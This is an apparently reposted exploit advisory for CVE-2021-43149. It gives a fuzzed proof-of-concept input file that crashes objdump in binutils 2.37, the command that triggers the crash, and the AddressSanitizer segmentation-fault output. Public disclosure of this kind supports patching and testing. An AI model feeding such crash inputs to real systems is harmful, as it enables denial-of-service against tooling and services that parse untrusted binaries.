Exploit/Advisories no image

Published on April 8th, 2022 📆 | 4340 Views ⚑

0

binutils 2.37 Objdump Segmentation Fault – Torchsec


Powered by iSpeech

# Exploit Title: binutils 2.37 - Objdump Segmentation Fault
# Date: 2021-11-03
# Exploit Author: p3tryx
# Vendor Homepage: https://www.gnu.org/software/binutils/
# Version: binutils 2.37
# Tested on: Ubuntu 18.04
# CVE : CVE-2021-43149

Payload file

```

%223"9720083=Q333A111111114111113333<33A $$$FF)$80 1114
080990111111111111111-11111111111111111111111111111111111'111111111111111111
111111*111111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111
$%22622FF7FFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1))FF)$1 1111
$%22111111111111111111111111111111111.1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101111111111111111111111111111111111111111111111111111111111111111111111111111622FF
000FFFFFFFFFFFFFFFFFFFFF222CFFFFFF 81 8D 1111
$%22622FF7FFFFFFFFF111111111111111111111111111111111111111111111111111111q1111111111111111111111111111111111111
1))FF)$1 1111
$%22622FFFFFDFFFFFFFFFFFFFFFFFFFFF222CFFFFFF 81 8D 1111
$%22622FF7FFFFFFFFF11111111111111111,1FF83 81 8D 1111
$%22622FF7FFFFFFFFFFFFFFF FF

080990 1))FF)$80 1114
08099011111111111111)111111111111111111111111111111111111111111111111111111
1))FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF 81 { 8D 1111
$%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1))FF)$1 1111
$%226221111111111111111111111111111111111111111111100
0111111111111111111111111111111111111111111111FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF
81 8D 111
$%22622FFF1111111111111111111FF83))FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF2E2CF9FFFF 98 81 8D 1111
$%22622FF7FFFFFFFFF1111111111111111111111111111111111111111111111111111111111111111111111111111
1))FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF222CFFFFFF 81 8D 1111
$%22622FF7FFFFFFFFF1111111111111111111FF83 81 8D 1111
$%22622FF7FFFFFFFFFFFFFFF FF

08099 1))FF)$80 1114
080990111111111111111111111111111111111111111111111111111'111111111111111111
1111111111111111111111111111111>11111111111d000111111111111111111
111111111111111111111111111111111111111111111111111*111111111111111111111111.1111111111111111111111111111111;111011111111111111111111111111111111111111111111111111EA111111111111111
$%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111.1111111111111111111111$1
1111
$%22622FFFFFFF1111111111111111111111111111BFBFBFBFBFBF1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111!11111111111111'111111111111111111
111111111111@111111111111111111d01111
011111111111111111111111111111111111111111111111*1111111111111111111111111111111111111111111111111111111111110111111111151111111111111111111111111111111111111111111111111111)111111111111111111111111111F111111111111111111111111
1111111FFFFFFFFFFLFFFFFFF11111111 111111111111111111111111111111111
$%22622FF7FFF111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111P1111111111111111111111111111111111111111111111111111111111111111111111111111111111.11111111111111111111111111111111111111N1111111111111111111111111111111111111111111111111
1111111111111111111111111111FFFF1111111117111111111111111111111111111111111))FF)$11111111111111111111111111111111111111111111111111111111111111111111111111*111111111111111111111111111111111111111111111111111111111111@111111111111111111111111111111111111111111111111111100
011111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111M111111R111111111111
111111111111 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1))FF)$1 1I11
$%22622FFFFFF1FFFFFFFFFFFFFFFFFFFF222CFFFFFF 81 8D 1111
$%22622FF7FFFFFFFFF111111111111
111111111111111111111111111111111111111111111 1))FF)$1 1111
$%22622FFFFFFFFFFFFFFFFFFFFFFFFFFF$%22622FFFFFFFFFFFFFMFFFFFFFFFFFFF222CFFFFFF
81 8D 1111
$%22622FF7FFFFFFFFF11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111FFFFFF
FF





080990 1))FF)$80 1111 080990a1))FF)$1 1J11
$%22@22FF11111FFFFFFFFFFFFFF222$)$

```

RUN the POC

# binutils-2.37/binutils/objdump -T -D -x crash_2.37
ASAN:SIGSEGV
=================================================================
==27705==ERROR: AddressSanitizer: SEGV on unknown address
0x000000000000 (pc 0x000000000000 bp 0x7fffffffdee0 sp 0x7fffffffde38
T0)
==27705==Hint: pc points to the zero page.

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
==27705==ABORTING

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑